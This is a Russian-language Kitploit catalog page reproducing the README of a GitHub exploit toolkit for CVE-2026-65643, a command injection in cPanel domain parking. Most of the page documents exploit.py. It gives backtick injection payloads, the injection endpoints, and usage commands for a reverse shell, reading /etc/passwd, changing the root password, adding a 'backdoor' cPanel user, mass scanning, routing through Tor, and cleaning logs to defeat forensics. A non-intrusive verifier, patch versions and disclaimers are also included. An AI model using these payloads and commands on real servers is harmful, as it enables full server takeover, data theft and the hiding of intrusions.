Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-65643-PoC-Toolkit — Red/Blue team набор инструментов для CVE-2026-65643, RCE-уязвимости в парковке доменов cPanel. Включает эксплойт с reverse shell, веб-шелл, закрепление (persistence) и массовое сканирование, а также неинтрузивный верификатор для обнаружения и аудита. | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
Повышение привилегийСканеры уязвимостейМеханизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Red/Blue team набор инструментов для CVE-2026-65643, RCE-уязвимости в парковке доменов cPanel. Включает эксплойт с reverse shell, веб-шелл, закрепление (persistence) и массовое сканирование, а также неинтрузивный верификатор для обнаружения и аудита.

Репозиторий
1 день назадЕщё не проверено

CVEPoC

CVE‑2026‑65643 – cPanel Domain Parking RCE Toolkit

Python 3.8+ CVSS Author cPanel

⚠️ ТОЛЬКО ДЛЯ ЭТИЧЕСКОГО ИСПОЛЬЗОВАНИЯ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Этот репозиторий предоставляет инструменты только для авторизованных специалистов по безопасности, blue teams и пентестеров.
Несанкционированный доступ к компьютерным системам является незаконным в соответствии с CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичными законами по всему миру.


📖 Обзор уязвимости

CVE‑2026‑65643 — критическая уязвимость внедрения команд в cPanel & WHM версий 11.x, которая позволяет аутентифицированному пользователю cPanel выполнять произвольные системные команды с привилегиями root через функциональность парковки доменов.

Как это работает

  1. Требуется аутентифицированный доступ – атакующий должен иметь действующую учётную запись cPanel (имя пользователя/пароль) на целевом сервере.
  2. Внедрение при парковке домена – при добавлении припаркованного домена имя домена не проходит должную санитизацию, что позволяет атакующему внедрять shell-команды с помощью обратных кавычек (`).
  3. Выполнение команд – внедрённая команда выполняется системой с привилегиями пользователя cPanel, которые могут быть повышены до root с помощью техник повышения привилегий.
  4. Привилегии root – поскольку операция парковки домена выполняется с достаточными правами, произвольные команды могут выполняться с высокими привилегиями.
  5. Воздействие – полная компрометация сервера, кража данных, бэкдоры, программы-вымогатели и горизонтальное перемещение. Немедленно обновитесь!

Затронутые версии

  • cPanel & WHM 11.110.0.140 и более ранние – уязвимы
  • 11.134.0.52 и более ранние – уязвимы
  • 11.136.0.36 и более ранние – уязвимы
  • 11.138.0.1 и более ранние – уязвимы
  • 11.138.1.6 и более поздние – исправлены

Патч

  • Обновитесь до cPanel & WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53 или 11.110.0.141 или новее.
  • Если обновление невозможно, отключите разрешения на парковку доменов для пользователей cPanel в качестве временного обходного решения.

🧰 Инструменты

ИнструментНазначениеЦелевой пользователь
exploit.pyПолнофункциональный набор инструментов с reverse shell, веб-шеллом, персистентностью, чтением/записью файлов, сменой root-пароля, массовым сканированием, поддержкой Tor и функциями OPSEC.

📊 Сравнение функций


🎯 Сводка по сценариям использования


⚙️ Установка

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 Параметры

Параметры exploit.py

Параметры verifier.py


💥 Сценарии


🧪 Конечные точки и методы внедрения

Эксплойт использует следующие конечные точки и методы внедрения cPanel:

Формат payload

root@kitploit:~
# Формат payload для внедрения
test.com`<команда>`

# Пример
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ Ответственное использование

  • Используйте эти инструменты только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
  • Несанкционированный доступ является незаконным и неэтичным.
  • Авторы не несут ответственности за любое неправомерное использование.
  • Всегда соблюдайте законы и нормативные акты вашей страны.

Это программное обеспечение предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Скачать инструмент
Red teams / авторизованные пентестеры
verifier.pyНеинтрузивный проверщик уязвимостей, который определяет версию cPanel, проверяет внедрение и оценивает риск без выполнения вредоносных payload-ов. Генерирует подробные отчёты.Blue teams / аудиторы безопасности
Функцияexploit.pyverifier.py
Обнаружение уязвимости✅✅
Определение версии (4 конечные точки)✅✅
Внедрение команд✅❌
Reverse shell✅❌
Загрузка WebShell✅❌
Персистентность (создание пользователя cPanel)✅❌
Смена root-пароля✅❌
Чтение/запись файлов✅❌
4 метода внедрения (JSON/Form/CGI/API2)✅✅
Поддержка Tor (анонимность)✅❌
Ротация User-Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Массовое сканирование (многопоточность)✅❌
Интерактивный shell✅❌
Неинтрузивный (безопасный) режим❌✅
Журналирование по времени✅✅
HTML-отчёт✅❌
JSON-отчёт✅✅
Очистка журналов (анти-форензика)✅✅
Поддержка прокси✅✅
Пользовательский User-Agent✅✅
Управление проверкой SSL✅✅
СценарийРекомендуемый инструмент
Blue Team – проверка, уязвима ли ваша установка cPanelverifier.py
Аудит безопасности – неинтрузивная оценка уязвимостейverifier.py
Red Team – авторизованное пентестирование с полной эксплуатациейexploit.py
Bug Bounty – тестирование с ответственным раскрытиемverifier.py
Массовое сканирование – проверка нескольких целей на уязвимостьexploit.py (только обнаружение)
Реагирование на инциденты – проверка, скомпрометированы ли системыverifier.py
ПараметрОписание
-t, --targetЦелевой URL cPanel (например, https://cpanel.example.com:2083)
-l, --target-fileФайл со списком целей (по одной на строку) для массового сканирования
-u, --usernameИмя пользователя cPanel
-P, --passwordПароль cPanel
-p, --portПереопределить порт cPanel (по умолчанию из URL или 2083)
--threadsКоличество потоков для нескольких целей (по умолчанию: 10)
-o, --outputСохранить JSON-отчёт в файл
--html-reportСохранить HTML-отчёт в файл
-v, --verboseПодробный вывод
--proxyHTTP/HTTPS прокси (например, http://127.0.0.1:8080)
--torМаршрутизация через Tor (localhost:9050)
-ua, --user-agentПользовательский User-Agent
--no-keep-aliveНе поддерживать сессию активной
--delayЗадержка между запросами (по умолчанию: 2.0с)
--jitterСлучайный jitter (0‑1 сек) между запросами (по умолчанию: 0.5)
--max-retriesМаксимальное количество повторов (по умолчанию: 5)
--ssl-verifyПроверять SSL-сертификаты
--timeoutТаймаут запроса (по умолчанию: 15с)
--cmdВыполнить одну команду на цели
--reverse-shellReverse shell IP:PORT
--passwdСменить root-пароль
--adduserСоздать пользователя cPanel (USER DOMAIN PASSWORD)
--readПрочитать файл
--writeЗаписать файл (указать путь)
--write-contentСодержимое для записи
--cleanupОчистить журналы и историю после эксплуатации
-i, --interactiveИнтерактивный shell после эксплуатации
--domain-suffixСуффикс для припаркованного домена (по умолчанию: exploit.local)
ПараметрОписание
-t, --targetЦелевой URL cPanel (например, https://cpanel.example.com:2083)
-u, --usernameИмя пользователя cPanel
-P, --passwordПароль cPanel
-o, --outputСохранить JSON-отчёт в файл
-v, --verboseПодробный вывод
--proxyHTTP/HTTPS прокси (например, http://127.0.0.1:8080)
--torМаршрутизация через Tor (localhost:9050)
--ssl-verifyПроверять SSL-сертификаты
--timeoutТаймаут запроса (по умолчанию: 15с)
--cleanupОчистить журналы после теста
#СценарийКоманда
1Быстрая проверка уязвимостиpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2Детальное сканирование с отчётомpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Выполнение командыpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5Чтение конфиденциального файлаpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Смена root-пароляpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Создание нового пользователя cPanel (персистентность)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Интерактивный shell после эксплуатацииpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Массовое сканирование из файлаpython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10Использование прокси, Tor и пользовательского User-Agentpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11Очистка журналов после эксплуатацииpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
МетодКонечная точкаОписание
JSON API/cpsessXXXXX/json-api/domainОсновной метод внедрения через JSON-payload
Form Data/cpsessXXXXX/json-api/domainАльтернативное внедрение через данные в формате form
CGI Script/cgi-sys/domainpark.cgiВнедрение через устаревшую конечную точку CGI
API2/cpsessXXXXX/json-api/cpanelУстаревший метод внедрения через API2